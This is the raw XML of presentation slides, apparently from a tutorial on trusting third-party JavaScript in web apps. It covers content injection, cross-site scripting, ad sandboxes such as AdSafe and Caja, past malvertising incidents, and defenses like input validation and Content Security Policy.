                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parties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Attacker model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attacker is in control of one or more services, e.g., the analytics service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attacker is able to inject content via one or more services, e.g., the ad service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attacker is able to interact as a user with app, e.g., by posting entries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In short, the attacker is able to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into the app</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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goal of this tutorial</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Bildobjekt 6" descr="target-da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257" y="1410241"/>
            <a:ext cx="2895943" cy="2862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061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 you trust 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> parties?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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injection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21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Rak 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840677" y="3535607"/>
            <a:ext cx="4672556" cy="9686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Rak 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137943" y="4277400"/>
            <a:ext cx="2776024" cy="20048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Attack 1: Content injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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813" y="2637511"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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943" y="3535607"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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400" y="3203483"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Bildobjekt 12" descr="analytics-icon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867" y="5007661"/>
            <a:ext cx="672527" cy="672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4" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2787307" y="4328127"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378131" y="4401954"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777524" y="3030849"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018640" y="2772769"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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136" y="2076223"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery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8" y="2174829"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809538" y="2174829"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333875" y="1794773"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599230" y="3370129"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512788" y="23050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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872937" y="508711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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Bildobjekt 29" descr="Screen Shot 2015-08-04 at 12.40.43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487" y="4401954"/>
            <a:ext cx="2948375" cy="2133692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Bildobjekt 32" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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234" y="3032312"/>
            <a:ext cx="853661" cy="853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Bildobjekt 33" descr="Cloud-Hosting-4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234" y="1934576"/>
            <a:ext cx="831354" cy="831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6" name="Rak pil 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5506167" y="2472844"/>
            <a:ext cx="1232490" cy="29308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Rak pil 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506167" y="2960664"/>
            <a:ext cx="1232490" cy="47036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Frihandsfigur 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227589" y="3050399"/>
            <a:ext cx="4982086" cy="1060652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4982086"/>
              <a:gd name="connsiteY0" fmla="*/ 927277 h 1060652"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 4982086"/>
              <a:gd name="connsiteY1" fmla="*/ 984266 h 1060652"/>
              <a:gd name="connsiteX2" fmla="*/ 2841092 w 4982086"/>
              <a:gd name="connsiteY2" fmla="*/ 15455 h 1060652"/>
              <a:gd name="connsiteX3" fmla="*/ 4982086 w 4982086"/>
              <a:gd name="connsiteY3" fmla="*/ 479507 h 1060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82086" h="1060652">
                <a:moveTo>
                  <a:pt x="0" y="927277"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="357511" y="1031756"/>
                  <a:pt x="715022" y="1136236"/>
                  <a:pt x="1188537" y="984266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1662052" y="832296"/>
                  <a:pt x="2208834" y="99581"/>
                  <a:pt x="2841092" y="15455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3473350" y="-68672"/>
                  <a:pt x="4227718" y="205417"/>
                  <a:pt x="4982086" y="479507"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId15"/>
          <a:srcRect r="11976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214037" y="5826345"/>
            <a:ext cx="608936" cy="621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2" name="Bildobjekt 41" descr="1366511188978779390free-red-cloud-advertising-md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730" y="5004140"/>
            <a:ext cx="676048" cy="676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Rak pil 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1822973" y="5614072"/>
            <a:ext cx="412757" cy="229207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Frihandsfigur 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1634489" y="3751351"/>
            <a:ext cx="1762273" cy="2027731"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 634971 w 1762273"/>
              <a:gd name="connsiteY0" fmla="*/ 138957 h 2027731"/>
              <a:gd name="connsiteX1" fmla="*/ 1750242 w 1762273"/>
              <a:gd name="connsiteY1" fmla="*/ 195946 h 2027731"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 1762273"/>
              <a:gd name="connsiteY2" fmla="*/ 2027731 h 2027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273" h="2027731">
                <a:moveTo>
                  <a:pt x="634971" y="138957"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1245521" y="10053"/>
                  <a:pt x="1856071" y="-118850"/>
                  <a:pt x="1750242" y="195946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1644414" y="510742"/>
                  <a:pt x="0" y="2027731"/>
                  <a:pt x="0" y="2027731"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF0000"/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ihandsfigur 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2272945" y="4107116"/>
            <a:ext cx="1089771" cy="1475854"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1089771"/>
              <a:gd name="connsiteY0" fmla="*/ 1475854 h 1475854"/>
              <a:gd name="connsiteX1" fmla="*/ 643566 w 1089771"/>
              <a:gd name="connsiteY1" fmla="*/ 986763 h 1475854"/>
              <a:gd name="connsiteX2" fmla="*/ 1089771 w 1089771"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1475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9771" h="1475854">
                <a:moveTo>
                  <a:pt x="0" y="1475854"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="230969" y="1354296"/>
                  <a:pt x="461938" y="1232739"/>
                  <a:pt x="643566" y="986763"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="825194" y="740787"/>
                  <a:pt x="1089771" y="0"/>
                  <a:pt x="1089771" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 42" descr="search.png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489" y="3673504"/>
            <a:ext cx="504000" cy="50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4241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872229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Injection attacks are the #1 on the OWASP Top 10 – 2013 [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]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untrusted data is sent to an interpreter as part of a command or query </a:t>
            </a:r>
          </a:p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Input validation – how do we validate JavaScript?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Cannot prohibit scripting -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ynamic ads require JavaScript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Hard to isolate; scripts need access to page to render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Similar problem to allowing apps in apps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Facebook, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spotify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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evernote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Google Sites, Google Docs, Hotmail Active Views, …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Solution:  sandbox / verifiable subset / static verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AdSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, FBJS, Microsoft Web Sandbox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injection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710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87222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It depends, historically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>there have been ways of breaking out of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandbox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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spotify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ads hit by malware attack, March 2011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http://www.bbc.com/news/technology-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12891182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Malware delivered by Yahoo, Fox, Google ads, March 2010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http://www.cnet.com/news/malware-delivered-by-yahoo-fox-google-ads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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Malware ads hits London Stock Exchange Web site, March 2011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http://www.networkworld.com/article/2200448/data-center/malware-ads-hit-london-stock-exchange-web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site.html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Endeavour by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Politz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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Guha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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Krishnamurthi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adsafe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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Type-Based Verification of Web Sandboxes [JCS 2014]</a:t>
            </a:r>
          </a:p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ads, Problem solved?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56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 you trust other users?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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site scripting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584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Rak 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840677" y="3535607"/>
            <a:ext cx="4672556" cy="9686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Rak 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137943" y="4277400"/>
            <a:ext cx="2776024" cy="20048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Attack 2: Cross site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="imgres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813" y="2637511"/>
            <a:ext cx="800354" cy="80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Bildobjekt 15" descr="imgr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943" y="3535607"/>
            <a:ext cx="741793" cy="741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Bildobjekt 4" descr="j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400" y="3203483"/>
            <a:ext cx="664247" cy="664247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Bildobjekt 12" descr="analytics-icon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867" y="5007661"/>
            <a:ext cx="672527" cy="672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4" name="Rak pil 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2787307" y="4328127"/>
            <a:ext cx="350636" cy="67953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Rak pil 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3378131" y="4401954"/>
            <a:ext cx="0" cy="49661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Frihandsfigur 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777524" y="3030849"/>
            <a:ext cx="903613" cy="472194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 903613 w 903613"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 472194"/>
              <a:gd name="connsiteX1" fmla="*/ 276782 w 903613"/>
              <a:gd name="connsiteY1" fmla="*/ 162826 h 472194"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 903613"/>
              <a:gd name="connsiteY2" fmla="*/ 472194 h 47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3613" h="472194">
                <a:moveTo>
                  <a:pt x="903613" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="665498" y="42063"/>
                  <a:pt x="427384" y="84127"/>
                  <a:pt x="276782" y="162826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126180" y="241525"/>
                  <a:pt x="0" y="472194"/>
                  <a:pt x="0" y="472194"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Rak pil 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018640" y="2772769"/>
            <a:ext cx="1133312" cy="97858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2" name="Bildobjekt 21" descr="imgres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136" y="2076223"/>
            <a:ext cx="800354" cy="80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Bildobjekt 17" descr="jQurery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8" y="2174829"/>
            <a:ext cx="462682" cy="462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Bildobjekt 18" descr="modernizr-sticker.jpg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3667" r="963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36" t="18638" r="4562" b="17732"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809538" y="2174829"/>
            <a:ext cx="664624" cy="462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textruta 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333875" y="1794773"/>
            <a:ext cx="68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CDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="textruta 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599230" y="3370129"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="textruta 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512788" y="23050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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="textruta 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872937" y="508711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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Bildobjekt 29" descr="Screen Shot 2015-08-04 at 12.40.43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487" y="4401954"/>
            <a:ext cx="2948375" cy="2133692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Bildobjekt 32" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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234" y="3032312"/>
            <a:ext cx="853661" cy="853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Bildobjekt 33" descr="Cloud-Hosting-4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234" y="1934576"/>
            <a:ext cx="831354" cy="831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6" name="Rak pil 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5506167" y="2472844"/>
            <a:ext cx="1232490" cy="29308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Rak pil 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506167" y="2960664"/>
            <a:ext cx="1232490" cy="47036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Frihandsfigur 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227589" y="3050399"/>
            <a:ext cx="4982086" cy="1060652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4982086"/>
              <a:gd name="connsiteY0" fmla="*/ 927277 h 1060652"/>
              <a:gd name="connsiteX1" fmla="*/ 1188537 w 4982086"/>
              <a:gd name="connsiteY1" fmla="*/ 984266 h 1060652"/>
              <a:gd name="connsiteX2" fmla="*/ 2841092 w 4982086"/>
              <a:gd name="connsiteY2" fmla="*/ 15455 h 1060652"/>
              <a:gd name="connsiteX3" fmla="*/ 4982086 w 4982086"/>
              <a:gd name="connsiteY3" fmla="*/ 479507 h 1060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82086" h="1060652">
                <a:moveTo>
                  <a:pt x="0" y="927277"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="357511" y="1031756"/>
                  <a:pt x="715022" y="1136236"/>
                  <a:pt x="1188537" y="984266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1662052" y="832296"/>
                  <a:pt x="2208834" y="99581"/>
                  <a:pt x="2841092" y="15455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3473350" y="-68672"/>
                  <a:pt x="4227718" y="205417"/>
                  <a:pt x="4982086" y="479507"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId15"/>
          <a:srcRect r="11976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1568162" y="4277208"/>
            <a:ext cx="608936" cy="621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2" name="Bildobjekt 41" descr="1366511188978779390free-red-cloud-advertising-md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730" y="5004140"/>
            <a:ext cx="676048" cy="676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Bildobjekt 42" descr="search.png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489" y="3673504"/>
            <a:ext cx="504000" cy="50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Rak pil 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2297376" y="4044826"/>
            <a:ext cx="854576" cy="543064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rihandsfigur 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224571" y="3836617"/>
            <a:ext cx="1337506" cy="725945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1337506"/>
              <a:gd name="connsiteY0" fmla="*/ 127311 h 725945"/>
              <a:gd name="connsiteX1" fmla="*/ 1181046 w 1337506"/>
              <a:gd name="connsiteY1" fmla="*/ 14056 h 725945"/>
              <a:gd name="connsiteX2" fmla="*/ 1205314 w 1337506"/>
              <a:gd name="connsiteY2" fmla="*/ 410449 h 725945"/>
              <a:gd name="connsiteX3" fmla="*/ 80894 w 1337506"/>
              <a:gd name="connsiteY3" fmla="*/ 725945 h 725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506" h="725945">
                <a:moveTo>
                  <a:pt x="0" y="127311"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="490080" y="47088"/>
                  <a:pt x="980160" y="-33134"/>
                  <a:pt x="1181046" y="14056"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1381932" y="61246"/>
                  <a:pt x="1388673" y="291801"/>
                  <a:pt x="1205314" y="410449"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1021955" y="529097"/>
                  <a:pt x="80894" y="725945"/>
                  <a:pt x="80894" y="725945"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="317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142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XSS (still) an issue?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="1719071"/>
            <a:ext cx="8407893" cy="484972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Attack #3 on OWASP Top 10 – 2013! [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]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XSS has been around since the ‘90s! (at least) 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Solution: input validation and escaping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Whitelist input validation if possible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Use a Security Encoding Library – better chance of security than writing your own validation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OWASP XSS Prevention Cheat Sheet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just Google for it – see why you should avoid writing your own security library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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More recent solution: Content Security Policies (CSP)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HTTP response header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Load content only from origin and scripts from origin and the given static domain</a:t>
            </a:r>
          </a:p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Moving target defense! JavaScript syntax/API randomization</a:t>
            </a:r>
